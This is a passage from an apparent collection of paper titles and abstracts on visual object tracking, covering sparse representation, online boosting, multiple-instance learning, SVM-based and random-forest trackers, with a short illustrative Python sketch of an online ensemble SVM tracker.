realistic videos where the appearance and motion are drastically changing over time. --- paper_title: A bi-subspace model for robust visual tracking paper_content: The changes of the target's visual appearance often lead to tracking failure in practice. Hence, trackers need to be adaptive to non-stationary appearances to achieve robust visual tracking. However, the risk of adaptation drift is common in most existing adaptation schemes. This paper describes a bi-subspace model that stipulates the interactions of two different visual cues. The visual appearance of the target is represented by two interactive subspaces, each of which corresponds to a particular cue. The adaption of the subspaces is through the interaction of the two cues, which leads to robust tracking performance. Extensive experiments show that the proposed approach can largely alleviate adaptation drift and obtain better tracking results. --- paper_title: Non-sparse linear representations for visual tracking with online reservoir metric learning paper_content: Most sparse linear representation-based trackers need to solve a computationally expensive ℓ1-regularized optimization problem. To address this problem, we propose a visual tracker based on non-sparse linear representations, which admit an efficient closed-form solution without sacrificing accuracy. Moreover, in order to capture the correlation information between different feature dimensions, we learn a Mahalanobis distance metric in an online fashion and incorporate the learned metric into the optimization problem for obtaining the linear representation.
We show that online metric learning using proximity comparison significantly improves the robustness of the tracking, especially on those sequences exhibiting drastic appearance changes. Furthermore, in order to prevent the unbounded growth in the number of training samples for the metric learning, we design a time-weighted reservoir sampling method to maintain and update limited-sized foreground and background sample buffers for balancing sample diversity and adaptability. Experimental results on challenging videos demonstrate the effectiveness and robustness of the proposed tracker. --- paper_title: Direct appearance models paper_content: Active appearance model (AAM), which makes ingenious use of both shape and texture constraints, is a powerful tool for face modeling, alignment and facial feature extraction under shape deformations and texture variations. However, as we show through our analysis and experiments, there exist admissible appearances that are not modeled by AAM and hence cannot be reached by AAM search; also the mapping from the texture subspace to the shape subspace is many-to-one and therefore a shape should be determined entirely by the texture in it. We propose a new appearance model, called direct appearance model (DAM), without combining from shape and texture as in AAM. The DAM model uses texture information directly in the prediction of the shape and in the estimation of position and appearance (hence the name DAM). In addition, DAM predicts the new face position and appearance based on principal components of texture difference vectors, instead of the raw vectors themselves as in AAM. These lead to the following advantages over AAM: (1) DAM subspaces include admissible appearances previously unseen in AAM, (2) convergence and accuracy are improved, and (3) memory requirement is cut down to a large extent. The advantages are substantiated by comparative experimental results. --- paper_title: Active Appearance Models Revisited paper_content: Active Appearance Models (AAMs) and the closely related concepts of Morphable Models and Active Blobs are generative models of a certain visual phenomenon. Although linear in both shape and appearance, overall, AAMs are nonlinear parametric models in terms of the pixel intensities. Fitting an AAM to an image consists of minimising the error between the input image and the closest model instances i.e. solving a nonlinear optimisation problem. We propose an efficient fitting algorithm for AAMs based on the inverse compositional image alignment algorithm. We show that the effects of appearance variation during fitting can be precomputed (“projected out”) using this algorithm and how it can be extended to include a global shape normalising warp, typically a 2D similarity transformation. We evaluate our algorithm to determine which of its novel aspects improve AAM fitting performance. --- paper_title: Dynamical statistical shape priors for level set-based tracking paper_content: In recent years, researchers have proposed introducing statistical shape knowledge into level set-based segmentation methods in order to cope with insufficient low-level information. While these priors were shown to drastically improve the segmentation of familiar objects, so far the focus has been on statistical shape priors which are static in time. Yet, in the context of tracking deformable objects, it is clear that certain silhouettes (such as those of a walking person) may become more or less likely over time. 
In this paper, we tackle the challenge of learning dynamical statistical models for implicitly represented shapes. We show how these can be integrated as dynamical shape priors in a Bayesian framework for level set-based image sequence segmentation. We assess the effect of such shape priors "with memory" on the tracking of familiar deformable objects in the presence of noise and occlusion. We show comparisons between dynamical and static shape priors, between models of pure deformation and joint models of deformation and transformation, and we quantitatively evaluate the segmentation accuracy as a function of the noise level and of the camera frame rate. Our experiments demonstrate that level set-based segmentation and tracking can be strongly improved by exploiting the temporal correlations among consecutive silhouettes which characterize deforming shapes. --- paper_title: Robust Visual Tracking using ℓ1 Minimization paper_content: In this paper we propose a robust visual tracking method by casting tracking as a sparse approximation problem in a particle filter framework. In this framework, occlusion, corruption and other challenging issues are addressed seamlessly through a set of trivial templates. Specifically, to find the tracking target at a new frame, each target candidate is sparsely represented in the space spanned by target templates and trivial templates. The sparsity is achieved by solving an ℓ1-regularized least squares problem. Then the candidate with the smallest projection error is taken as the tracking target. After that, tracking is continued using a Bayesian state inference framework in which a particle filter is used for propagating sample distributions over time. Two additional components further improve the robustness of our approach: 1) the nonnegativity constraints that help filter out clutter that is similar to tracked targets in reversed intensity patterns, and 2) a dynamic template update scheme that keeps track of the most representative templates throughout the tracking procedure. We test the proposed approach on five challenging sequences involving heavy occlusions, drastic illumination changes, and large pose variations. The proposed approach shows excellent performance in comparison with three previously proposed trackers. --- paper_title: Real time robust L1 tracker using accelerated proximal gradient approach paper_content: Recently sparse representation has been applied to visual tracker by modeling the target appearance using a sparse approximation over a template set, which leads to the so-called L1 trackers as it needs to solve an ℓ1 norm related minimization problem for many times. While these L1 trackers showed impressive tracking accuracies, they are very computationally demanding and the speed bottleneck is the solver to ℓ1 norm minimizations. This paper aims at developing an L1 tracker that not only runs in real time but also enjoys better robustness than other L1 trackers. In our proposed L1 tracker, a new ℓ1 norm related minimization model is proposed to improve the tracking accuracy by adding an ℓ1 norm regularization on the coefficients associated with the trivial templates. Moreover, based on the accelerated proximal gradient approach, a very fast numerical solver is developed to solve the resulting ℓ1 norm related minimization problem with guaranteed quadratic convergence.
The great running time efficiency and tracking accuracy of the proposed tracker is validated with a comprehensive evaluation involving eight challenging sequences and five alternative state-of-the-art trackers. --- paper_title: Online learning of probabilistic appearance manifolds for video-based recognition and tracking paper_content: This paper presents an online learning algorithm to construct from video sequences an image-based representation that is useful for recognition and tracking. For a class of objects (e.g., human faces), a generic representation of the appearances of the class is learned off-line. From video of an instance of this class (e.g., a particular person), an appearance model is incrementally learned on-line using the prior generic model and successive frames from the video. More specifically, both the generic and individual appearances are represented as an appearance manifold that is approximated by a collection of sub-manifolds (named pose manifolds) and the connectivity between them. In turn, each sub-manifold is approximated by a low-dimensional linear sub-space while the connectivity is modeled by transition probabilities between pairs of sub-manifolds. We demonstrate that our online learning algorithm constructs an effective representation for face tracking, and its use in video-based face recognition compares favorably to the representation constructed with a batch technique. --- paper_title: On robustness of on-line boosting - a competitive study paper_content: On-line boosting is one of the most successful on-line algorithms and thus applied in many computer vision applications. However, even though boosting, in general, is well known to be susceptible to class-label noise, on-line boosting is mostly applied to self-learning applications such as visual object tracking, where label-noise is an inherent problem. This paper studies the robustness of on-line boosting. Since mainly the applied loss function determines the behavior of boosting, we propose an on-line version of GradientBoost, which allows us to plug in arbitrary loss-functions into the on-line learner. Hence, we can easily study the importance and the behavior of different loss-functions. We evaluate various on-line boosting algorithms in form of a competitive study on standard machine learning problems as well as on common computer vision applications such as tracking and autonomous training of object detectors. Our results show that using on-line Gradient-Boost with robust loss functions leads to superior results in all our experiments. --- paper_title: Gradient Feature Selection for Online Boosting paper_content: Boosting has been widely applied in computer vision, especially after Viola and Jones's seminal work. The marriage of rectangular features and integral-image- enabled fast computation makes boosting attractive for many vision applications. However, this popular way of applying boosting normally employs an exhaustive feature selection scheme from a very large hypothesis pool, which results in a less-efficient learning process. Furthermore, this poses additional constraint on applying boosting in an onine fashion, where feature re-selection is often necessary because of varying data characteristic, but yet impractical due to the huge hypothesis pool. This paper proposes a gradient-based feature selection approach. 
Assuming a generally trained feature set and labeled samples are given, our approach iteratively updates each feature using gradient descent, by minimizing the weighted least-squares error between the estimated feature response and the true label. In addition, we integrate the gradient-based feature selection with an online boosting framework. This new online boosting algorithm not only provides an efficient way of updating the discriminative feature set, but also presents a unified objective for both feature selection and weak classifier updating. Experiments on person detection and tracking applications demonstrate the effectiveness of our proposal. --- paper_title: Online bagging and boosting paper_content: Bagging and boosting are two of the most well-known ensemble learning methods due to their theoretical performance guarantees and strong experimental results. However, these algorithms have been used mainly in batch mode, i.e., they require the entire training set to be available at once and, in some cases, require random access to the data. In this paper, we present online versions of bagging and boosting that require only one pass through the training data. We build on previously presented work by describing some theoretical results. We also compare the online and batch algorithms experimentally in terms of accuracy and running time. --- paper_title: Online selecting discriminative tracking features using particle filter paper_content: The paper proposes a method to keep the tracker robust to background clutter by selecting discriminative features online from a large feature space. Furthermore, the feature selection procedure is embedded into the particle filtering process with the aid of existing "background" particles. Feature values from background patches and object observations are sampled during tracking, and the Fisher discriminant is employed to rank the classification capacity of each feature based on the sampled values. Top-ranked discriminative features are selected into the appearance model and, simultaneously, invalid features are removed to adjust the object representation adaptively. The implemented tracker, with the online discriminative feature selection module embedded, shows promising results on experimental video sequences. --- paper_title: Robust visual tracking via transfer learning paper_content: In this paper, we propose a boosting-based tracking framework using transfer learning. To deal with complex appearance variations, the proposed tracking framework tries to utilize discriminative information from previous frames to conduct the tracking task in the current frame, and thus transfers some prior knowledge from the previous source data domain to the current target data domain, resulting in a highly discriminative tracker for distinguishing the object from the background. The proposed tracking system has been tested on several challenging sequences. Experimental results demonstrate the effectiveness of the proposed tracking framework. --- paper_title: Dynamic ensemble for target tracking paper_content: On-line boosting is a recent breakthrough in the machine learning literature that has opened new possibilities in many diverse fields. Instead of generating a static strong classifier off-line, the classifier can be built on-the-fly on incoming samples. This has been successfully exploited in treating computer vision tasks such as tracking as a classification problem, thus providing an intriguing new perspective to an old subject.
Known solutions to the on-line boosting problem rely on a fixed number of weak classifiers. The first main contribution of this paper removes this limitation and shows how a dynamic ensemble can better address the tracking problem by providing increased robustness. The second proposed novelty consists in a mechanism for detecting scale changes of tracked targets. Promising results are shown on publicly available and our own video sequences. --- paper_title: Robust real-time object detection paper_content: This paper describes a visual object detection framework that is capable of processing images extremely rapidly while achieving high detection rates. There are three key contributions. The first is the introduction of a new image representation called the "Integral Image" which allows the features used by our detector to be computed very quickly. The second is a learning algorithm, based on AdaBoost, which selects a small number of critical visual features and yields extremely efficient classifiers [4]. The third contribution is a method for combining classifiers in a "cascade" which allows background regions of the image to be quickly discarded while spending more computation on promising object-like regions. A set of experiments in the domain of face detection is presented. The system yields face detection performance comparable to the best previous systems [16, 11, 14, 10, 1]. Implemented on a conventional desktop, face detection proceeds at 15 frames per second. --- paper_title: A Boosted Particle Filter: Multitarget Detection and Tracking paper_content: The problem of tracking a varying number of non-rigid objects has two major difficulties. First, the observation models and target distributions can be highly non-linear and non-Gaussian. Second, the presence of a large, varying number of objects creates complex interactions with overlap and ambiguities. To surmount these difficulties, we introduce a vision system that is capable of learning, detecting and tracking the objects of interest. The system is demonstrated in the context of tracking hockey players using video sequences. Our approach combines the strengths of two successful algorithms: mixture particle filters and Adaboost. The mixture particle filter [17] is ideally suited to multi-target tracking as it assigns a mixture component to each player. The crucial design issues in mixture particle filters are the choice of the proposal distribution and the treatment of objects leaving and entering the scene.
Here, we construct the proposal distribution using a mixture model that incorporates information from the dynamic models of each player and the detection hypotheses generated by Adaboost. The learned Adaboost proposal distribution allows us to quickly detect players entering the scene, while the filtering process enables us to keep track of the individual players. The result of interleaving Adaboost with mixture particle filters is a simple, yet powerful and fully automatic multiple object tracking system. --- paper_title: Ensemble Tracking paper_content: We consider tracking as a binary classification problem, where an ensemble of weak classifiers is trained online to distinguish between the object and the background. The ensemble of weak classifiers is combined into a strong classifier using AdaBoost. The strong classifier is then used to label pixels in the next frame as either belonging to the object or the background, giving a confidence map. The peak of the map, and hence the new position of the object, is found using mean shift. Temporal coherence is maintained by updating the ensemble with new weak classifiers that are trained online during tracking. We show a realization of this method and demonstrate it on several video sequences. --- paper_title: Functional Gradient Techniques for Combining Hypotheses paper_content: This chapter contains sections titled: Introduction, Optimizing Cost Functions of the Margin, A Gradient Descent View of Voting Methods, Theoretically Motivated Cost Functions, Convergence Results, Experiments, Conclusions, Acknowledgments --- paper_title: Online multiple instance learning with no regret paper_content: Multiple instance (MI) learning is a recent learning paradigm that is more flexible than standard supervised learning algorithms in the handling of label ambiguity. It has been used in a wide range of applications including image classification, object detection and object tracking. Typically, MI algorithms are trained in a batch setting in which the whole training set has to be available before training starts. However, in applications such as tracking, the classifier needs to be trained continuously as new frames arrive. Motivated by the empirical success of a batch MI algorithm called MILES, we propose in this paper an online MI learning algorithm that has an efficient online update procedure and also performs joint feature selection and classification as MILES does. Besides, while existing online MI algorithms lack theoretical properties, we prove that the proposed online algorithm has a (cumulative) regret of O(√T), where T is the number of iterations. In other words, the average regret goes to zero asymptotically and it thus achieves the same performance as the best solution in hindsight. Experiments on a number of MI classification and object tracking data sets demonstrate encouraging results. --- paper_title: A robust boosting tracker with minimum error bound in a co-training framework paper_content: The varying object appearance and the unlabeled data from new frames are persistent challenges in object tracking. Recently, machine learning methods have been widely applied to tracking, and some online and semi-supervised algorithms have been developed to handle these difficulties. In this paper, we consider tracking as a classification problem and present a novel tracking method based on boosting in a co-training framework. The proposed tracker can be updated online and boosted with multi-view weak hypotheses.
The most important contribution of this paper is that we find a boosting error upper bound in a co-training framework to guide the construction of the novel tracker. In theory, the proposed tracking method is proved to minimize this error bound. In experiments, the accuracy of foreground/background classification and the tracking results both serve as evaluation metrics. Experimental results show good performance of the proposed tracker on challenging sequences. --- paper_title: Semi-Supervised On-line Boosting for Robust Tracking paper_content: Recently, on-line adaptation of binary classifiers for tracking has been investigated. On-line learning allows for simple classifiers, since only the current view of the object needs to be discriminated from its surrounding background. However, on-line adaptation faces one key problem: each update of the tracker may introduce an error which, finally, can lead to tracking failure (drifting). The contribution of this paper is a novel on-line semi-supervised boosting method which significantly alleviates the drifting problem in tracking applications. This makes it possible to limit the drifting problem while still staying adaptive to appearance changes. The main idea is to formulate the update process in a semi-supervised fashion as a combined decision of a given prior and an on-line classifier. This comes without any parameter tuning. In the experiments, we demonstrate real-time tracking of our SemiBoost tracker on several challenging test sequences where our tracker outperforms other on-line tracking methods. --- paper_title: On-line semi-supervised multiple-instance boosting paper_content: A recent dominating trend in tracking called tracking-by-detection uses on-line classifiers in order to redetect objects over succeeding frames. Although these methods usually deliver excellent results and run in real-time, they also tend to drift in case of wrong updates during the self-learning process. Recent approaches tackled this problem by formulating tracking-by-detection as either one-shot semi-supervised learning or multiple instance learning. Semi-supervised learning allows for incorporating priors and is more robust in case of occlusions, while multiple-instance learning resolves the uncertainty of where to take positive updates during tracking. In this work, we propose an on-line semi-supervised learning algorithm which is able to combine both of these approaches into a coherent framework. This leads to more robust results than applying both approaches separately. Additionally, we introduce a combined loss that simultaneously uses labeled and unlabeled samples, which makes our tracker more adaptive compared to previous on-line semi-supervised methods. Experimentally, we demonstrate that by using our semi-supervised multiple-instance approach and utilizing robust learning methods, we are able to outperform state-of-the-art methods on various benchmark tracking videos. --- paper_title: Visual tracking with online Multiple Instance Learning paper_content: In this paper, we address the problem of learning an adaptive appearance model for object tracking. In particular, a class of tracking techniques called "tracking by detection" has been shown to give promising results at real-time speeds. These methods train a discriminative classifier in an online manner to separate the object from the background. This classifier bootstraps itself by using the current tracker state to extract positive and negative examples from the current frame.
Slight inaccuracies in the tracker can therefore lead to incorrectly labeled training examples, which degrade the classifier and can cause further drift. In this paper, we show that using Multiple Instance Learning (MIL) instead of traditional supervised learning avoids these problems, and can therefore lead to a more robust tracker with fewer parameter tweaks. We present a novel online MIL algorithm for object tracking that achieves superior results with real-time performance. --- paper_title: Robust tracking with weighted online structured learning paper_content: Robust visual tracking requires constant update of the target appearance model, but without losing track of previous appearance information. One of the difficulties with the online learning approach to this problem has been a lack of flexibility in the modelling of the inevitable variations in target and scene appearance over time. The traditional online learning approach to the problem treats each example equally, which leads to previous appearances being forgotten too quickly and a lack of emphasis on the most current observations. Through analysis of the visual tracking problem, we develop instead a novel weighted form of online risk which allows more subtlety in its representation. However, the traditional online learning framework does not accommodate this weighted form. We thus also propose a principled approach to weighted online learning using weighted reservoir sampling and provide a weighted regret bound as a theoretical guarantee of performance. The proposed novel online learning framework can handle examples with different importance weights for binary, multiclass, and even structured output labels in both linear and non-linear kernels. Applying the method to tracking results in an algorithm which is both efficient and accurate even in the presence of severe appearance changes. Experimental results show that the proposed tracker outperforms the current state-of-the-art. --- paper_title: Co-Tracking Using Semi-Supervised Support Vector Machines paper_content: This paper treats tracking as a foreground/background classification problem and proposes an online semi-supervised learning framework. Initialized with a small number of labeled samples, semi-supervised learning treats each new sample as unlabeled data. Classification of new data and updating of the classifier are achieved simultaneously in a co-training framework. The object is represented using independent features, and an online support vector machine (SVM) is built for each feature. The predictions from different features are fused by combining the confidence map from each classifier using a classifier weighting method which creates a final classifier that performs better than any classifier based on a single feature. The semi-supervised learning approach then uses the output of the combined confidence map to generate new samples and update the SVMs online. With this approach, the tracker gains increasing knowledge of the object and background and continually improves itself over time. Compared to other discriminative trackers, the online semi-supervised learning approach improves each individual classifier using the information from other features, thus leading to a more robust tracker. Experiments show that this framework performs better than state-of-the-art tracking algorithms on challenging sequences. --- paper_title: Robust tracking via weakly supervised ranking SVM paper_content: The appearance model is a key component of tracking algorithms.
Most existing approaches utilize the object information contained in the current and previous frames to construct the object appearance model and locate the object with the model in frame t + 1. This method may work well if the object appearance just fluctuates in short time intervals. Nevertheless, suboptimal locations will be generated in frame t + 1 if the visual appearance changes substantially from the model. Then, continuous changes would accumulate errors and finally result in a tracking failure. To cope with this problem, in this paper we propose a novel algorithm — the online Laplacian ranking support vector tracker (LRSVT) — to robustly locate the object. The LRSVT incorporates the labeled information of the object in the initial and the latest frames to resist occlusion and adapt to fluctuations of the visual appearance, and the weakly labeled information from frame t + 1 to adapt to substantial changes of the appearance. Extensive experiments on public benchmark sequences show the superior performance of LRSVT over some state-of-the-art tracking algorithms. --- paper_title: Support Vector Tracking paper_content: Support Vector Tracking (SVT) integrates the Support Vector Machine (SVM) classifier into an optic-flow based tracker. Instead of minimizing an intensity difference function between successive frames, SVT maximizes the SVM classification score. To account for large motions between successive frames, we build pyramids from the support vectors and use a coarse-to-fine approach in the classification stage. We show results of using a homogeneous quadratic polynomial kernel-SVT for vehicle tracking in image sequences. --- paper_title: Human tracking by multiple kernel boosting with locality affinity constraints paper_content: In this paper, we incorporate the concept of the Multiple Kernel Learning (MKL) algorithm, which is used in object categorization, into the human tracking field. For efficiency, we devise an algorithm called Multiple Kernel Boosting (MKB), instead of directly adopting MKL. MKB aims to find an optimal combination of many single-kernel SVMs focusing on different features and kernels by a boosting technique. Besides, we apply Locality Affinity Constraints (LAC) to each selected SVM. LAC is computed from the distribution of support vectors of the respective SVM, recording the underlying locality of the training data. An update scheme to reselect good SVMs, adjust their weights and recalculate LAC is also included. Experiments on standard and our own testing sequences show that our MKB tracking outperforms some other state-of-the-art algorithms in handling various conditions. --- paper_title: On-line ensemble SVM for robust object tracking paper_content: In this paper, we present a novel visual object tracking algorithm based on an ensemble of linear SVM classifiers. There are two main contributions in this paper. First of all, we propose a simple yet effective way of updating a linear SVM classifier on-line, where useful "Key Frames" of the target are automatically selected as support vectors. Secondly, we propose an on-line ensemble SVM tracker, which can effectively handle target appearance variation. The proposed algorithm makes better use of history information, which leads to better discrimination of the target and the surrounding background. The proposed algorithm is tested on many video clips including some publicly available ones. Experimental results show the robustness of our proposed algorithm, especially under large appearance change during tracking.
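To make the flavour of these SVM-based tracking-by-detection schemes concrete, the following sketch maintains one online linear classifier per feature channel and fuses their decisions with accuracy-driven weights. This is only an illustrative approximation, not the update rule of any of the papers above: the channel names, the exponential weight smoothing, and the use of scikit-learn's SGDClassifier as a stand-in for an online linear SVM are all assumptions.

```python
import numpy as np
from sklearn.linear_model import SGDClassifier


class OnlineEnsembleSVMTracker:
    """Illustrative online ensemble of linear SVMs, one per feature channel.

    Each channel classifier is updated with partial_fit (a stochastic
    approximation of an online linear SVM); channel weights follow the
    recent classification accuracy of each channel.
    """

    def __init__(self, channels, classes=(0, 1)):
        self.channels = list(channels)          # e.g. ["color", "lbp"] (hypothetical names)
        self.classes = np.asarray(classes)
        self.clfs = {c: SGDClassifier(loss="hinge", alpha=1e-4) for c in self.channels}
        self.weights = {c: 1.0 / len(self.channels) for c in self.channels}

    def update(self, feats, labels):
        """feats: dict channel -> (n, d) array; labels: (n,) with 0=background, 1=target."""
        for c in self.channels:
            clf = self.clfs[c]
            clf.partial_fit(feats[c], labels, classes=self.classes)
            acc = clf.score(feats[c], labels)   # crude reliability estimate of this channel
            self.weights[c] = 0.9 * self.weights[c] + 0.1 * acc
        total = sum(self.weights.values())
        self.weights = {c: w / total for c, w in self.weights.items()}

    def score(self, feats):
        """Weighted ensemble confidence for each candidate window."""
        n_candidates = len(next(iter(feats.values())))
        s = np.zeros(n_candidates)
        for c in self.channels:
            s += self.weights[c] * self.clfs[c].decision_function(feats[c])
        return s
```

In use, one would call `update` with samples harvested around the current target position each frame and pick the candidate window with the highest `score`; how samples are harvested and how drift is avoided is exactly what the semi-supervised and co-training variants above address.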
--- paper_title: Sparse Bayesian learning for efficient visual tracking paper_content: This paper extends the use of statistical learning algorithms for object localization. It has been shown that object recognizers using kernel-SVMs can be elegantly adapted to localization by means of spatial perturbation of the SVM. While this SVM applies to each frame of a video independently of other frames, the benefits of temporal fusion of data are well-known. This is addressed here by using a fully probabilistic relevance vector machine (RVM) to generate observations with Gaussian distributions that can be fused over time. Rather than adapting a recognizer, we build a displacement expert which directly estimates displacement from the target region. An object detector is used in tandem, for object verification, providing the capability for automatic initialization and recovery. This approach is demonstrated in real-time tracking systems where the sparsity of the RVM means that only a fraction of CPU time is required to track at frame rate. An experimental evaluation compares this approach to the state of the art, showing it to be a viable method for long-term region tracking. --- paper_title: On feature combination and multiple kernel learning for object tracking paper_content: This paper presents a new method for object tracking based on multiple kernel learning (MKL). MKL is used to learn an optimal combination of χ2 kernels and Gaussian kernels, each type of which captures a different feature. Our features include the color information and the spatial pyramid histogram (SPH) based on the global spatial correspondence of the geometric distribution of visual words. We propose a simple and effective way of updating the MKL classifier on-line, where useful tracking objects are automatically selected as support vectors. The algorithm handles target appearance variation and makes better use of history information, which leads to better discrimination of the target from the surrounding background. The experiments on real-world sequences demonstrate that our method can track objects accurately and robustly, especially under partial occlusion and large appearance change. --- paper_title: Struck: Structured output tracking with kernels paper_content: Adaptive tracking-by-detection methods are widely used in computer vision for tracking arbitrary objects. Current approaches treat the tracking problem as a classification task and use online learning techniques to update the object model. However, for these updates to happen one needs to convert the estimated object position into a set of labelled training examples, and it is not clear how best to perform this intermediate step. Furthermore, the objective for the classifier (label prediction) is not explicitly coupled to the objective for the tracker (accurate estimation of object position). In this paper, we present a framework for adaptive visual object tracking based on structured output prediction. By explicitly allowing the output space to express the needs of the tracker, we are able to avoid the need for an intermediate classification step. Our method uses a kernelized structured output support vector machine (SVM), which is learned online to provide adaptive tracking. To allow for real-time application, we introduce a budgeting mechanism which prevents the unbounded growth in the number of support vectors which would otherwise occur during tracking. Experimentally, we show that our algorithm is able to outperform state-of-the-art trackers on various benchmark videos.
Additionally, we show that we can easily incorporate additional features and kernels into our framework, which results in increased performance. --- paper_title: Implementing Decision Trees and Forests on a GPU paper_content: We describe a method for implementing the evaluation and training of decision trees and forests entirely on a GPU, and show how this method can be used in the context of object recognition. --- paper_title: Multiple-instance learning with randomized trees paper_content: Multiple-instance learning (MIL) allows for training classifiers from ambiguously labeled data. In computer vision, this learning paradigm has been recently used in many applications such as object classification, detection and tracking. This paper presents a novel multiple-instance learning algorithm for randomized trees called MIForests. Randomized trees are fast, inherently parallel and multi-class and are thus increasingly popular in computer vision. MIForests combine the advantages of these classifiers with the flexibility of multiple instance learning. In order to leverage the randomized trees for MIL, we define the hidden class labels inside target bags as random variables. These random variables are optimized by training random forests and using a fast iterative homotopy method for solving the non-convex optimization problem. Additionally, most previously proposed MIL approaches operate in batch or off-line mode and thus assume access to the entire training set. This limits their applicability in scenarios where the data arrives sequentially and in dynamic environments. We show that MIForests are not limited to off-line problems and present an on-line extension of our approach. In the experiments, we evaluate MIForests on standard visual MIL benchmark datasets where we achieve state-of-the-art results while being faster than previous approaches and being able to inherently solve multi-class problems. The on-line version of MIForests is evaluated on visual object tracking where we outperform the state-of-the-art method based on boosting. --- paper_title: On-Line Random Naive Bayes for Tracking paper_content: Randomized learning methods (i.e., Forests or Ferns) have shown excellent capabilities for various computer vision applications. However, it was shown that the tree structure in Forests can be replaced by even simpler structures, e.g., Random Naive Bayes classifiers, yielding similar performance. The goal of this paper is to benefit from these findings to develop an efficient on-line learner. Based on the principles of on-line Random Forests, we adapt the Random Naive Bayes classifier to the on-line domain. For that purpose, we propose to use on-line histograms as weak learners, which yield much better performance than simple decision stumps. Experimentally, we show that the approach is applicable to incremental learning on machine learning datasets. Additionally, we propose to use an IIR-filtering-like forgetting function for the weak learners to enable adaptivity, and evaluate our classifier on the task of tracking by detection. --- paper_title: Keypoint recognition using randomized trees paper_content: In many 3D object-detection and pose-estimation problems, runtime performance is of critical importance. However, there usually is time to train the system, which we show to be very useful.
Assuming that several registered images of the target object are available, we developed a keypoint-based approach that is effective in this context by formulating wide-baseline matching of keypoints extracted from the input images to those found in the model images as a classification problem. This shifts much of the computational burden to a training phase, without sacrificing recognition performance. As a result, the algorithm is robust, accurate, and fast enough for frame-rate performance. This reduction in runtime computational complexity is our first contribution. Our second contribution is to show that, in this context, a simple and fast keypoint detector suffices to support detection and tracking even under large perspective and scale variations. While earlier methods require a detector that can be expected to produce very repeatable results in general, which usually is very time-consuming, we simply find the most repeatable keypoints for the specific target object during the training phase. We have incorporated these ideas into a real-time system that detects planar, nonplanar, and deformable objects. It then estimates the pose of the rigid ones and the deformations of the others. --- paper_title: Random Forests paper_content: Random forests are a combination of tree predictors such that each tree depends on the values of a random vector sampled independently and with the same distribution for all trees in the forest. The generalization error for forests converges a.s. to a limit as the number of trees in the forest becomes large. The generalization error of a forest of tree classifiers depends on the strength of the individual trees in the forest and the correlation between them. Using a random selection of features to split each node yields error rates that compare favorably to Adaboost (Y. Freund & R. Schapire, Machine Learning: Proceedings of the Thirteenth International Conference, 1996, 148–156), but are more robust with respect to noise. Internal estimates monitor error, strength, and correlation, and these are used to show the response to increasing the number of features used in the splitting. Internal estimates are also used to measure variable importance. These ideas are also applicable to regression. --- paper_title: PROST: Parallel robust online simple tracking paper_content: Tracking-by-detection is increasingly popular in order to tackle the visual tracking problem. Existing adaptive methods suffer from the drifting problem, since they rely on self-updates of an on-line learning method. In contrast to previous work that tackled this problem by employing semi-supervised or multiple-instance learning, we show that augmenting an on-line learning method with complementary tracking approaches can lead to more stable results. In particular, we use a simple template model as a non-adaptive and thus stable component, a novel optical-flow-based mean-shift tracker as a highly adaptive element, and an on-line random forest as a moderately adaptive appearance-based learner. We combine these three trackers in a cascade. All of our components run on GPUs or similar multi-core systems, which allows for real-time performance. We show the superiority of our system over current state-of-the-art tracking methods in several experiments on publicly available data. --- paper_title: Robust Tracking Using Foreground-Background Texture Discrimination paper_content: This paper conceives of tracking as the developing distinction of a foreground against the background.
In this manner, fast changes in the object or background appearance can be dealt with. When modelling the target alone (and not its distinction from the background), changes of lighting or changes of viewpoint can invalidate the internal target model. As the main contribution, we propose a new model for the detection of the target using foreground/background texture discrimination. The background is represented as a set of texture patterns. During tracking, the algorithm maintains a set of discriminant functions each distinguishing one pattern in the object region from background patterns in the neighborhood of the object. The idea is to train the foreground/background discrimination dynamically, that is while the tracking develops. In our case, the discriminant functions are efficiently trained online using a differential version of Linear Discriminant Analysis (LDA). Object detection is performed by maximizing the sum of all discriminant functions. The method employs two complementary sources of information: it searches for the image region similar to the target object, and simultaneously it seeks to avoid background patterns seen before. The detection result is therefore less sensitive to sudden changes in the appearance of the object than in methods relying solely on similarity to the target. The experiments show robust performance under severe changes of viewpoint or abrupt changes of lighting. --- paper_title: Tracking low resolution objects by metric preservation paper_content: Tracking low resolution (LR) targets is a practical yet quite challenging problem in real applications. The loss of discriminative details in the visual appearance of the L-R targets confronts most existing visual tracking methods. Although the resolution of the LR video inputs may be enhanced by super resolution (SR) techniques, the large computational cost for high-quality SR does not make it an attractive option. This paper presents a novel solution to track LR targets without performing explicit SR. This new approach is based on discriminative metric preservation that preserves the structure in the high resolution feature space for LR matching. In addition, we integrate metric preservation with differential tracking to derive a closed-form solution to motion estimation for LR video. Extensive experiments have demonstrated the effectiveness and efficiency of the proposed approach. --- paper_title: Subclass discriminant analysis paper_content: Over the years, many discriminant analysis (DA) algorithms have been proposed for the study of high-dimensional data in a large variety of problems. Each of these algorithms is tuned to a specific type of data distribution (that which best models the problem at hand). Unfortunately, in most problems the form of each class pdf is a priori unknown, and the selection of the DA algorithm that best fits our data is done over trial-and-error. Ideally, one would like to have a single formulation which can be used for most distribution types. This can be achieved by approximating the underlying distribution of each class with a mixture of Gaussians. In this approach, the major problem to be addressed is that of determining the optimal number of Gaussians per class, i.e., the number of subclasses. In this paper, two criteria able to find the most convenient division of each class into a set of subclasses are derived. Extensive experimental results are shown using five databases. 
Comparisons are given against linear discriminant analysis (LDA), direct LDA (DLDA), heteroscedastic LDA (HLDA), nonparametric DA (NDA), and kernel-based LDA (K-LDA). We show that our method is always the best or comparable to the best. --- paper_title: Order determination and sparsity-regularized metric learning adaptive visual tracking paper_content: Recent attempts at integrating metric learning into visual tracking have produced encouraging results. Instead of using a fixed and pre-specified metric in visual appearance matching, these methods are able to learn and adjust the metric adaptively by finding the best projection of the feature space. Such a learned metric is by design the best at discriminating the target of interest and its distracters from the background. However, an important issue that remains unaddressed is how to determine the optimal dimensionality of the projection to achieve the best discrimination. Using inappropriate dimensions for the projection is likely to result in larger classification error, or higher computational costs and over-fitting. This paper presents a novel solution to this structural order determination problem, by introducing sparsity regularization for metric learning (or SRML). This regularization leads to the lowest possible dimensionality of the projection and thus determines the best order. This can actually be viewed as minimum description length regularization in metric learning. The experiments validate this new approach on standard benchmark datasets, and demonstrate its effectiveness in visual tracking applications. --- paper_title: Graph Based Discriminative Learning for Robust and Efficient Object Tracking paper_content: Object tracking is viewed as a two-class 'one-versus-rest' classification problem, in which the sample distribution of the target is approximately Gaussian while the background samples are often multimodal. Based on these special properties, we propose a graph embedding based discriminative learning method, in which the topology structures of graphs are carefully designed to reflect the properties of the sample distributions. This method can simultaneously learn the subspace of the target and its local discriminative structure against the background. Moreover, 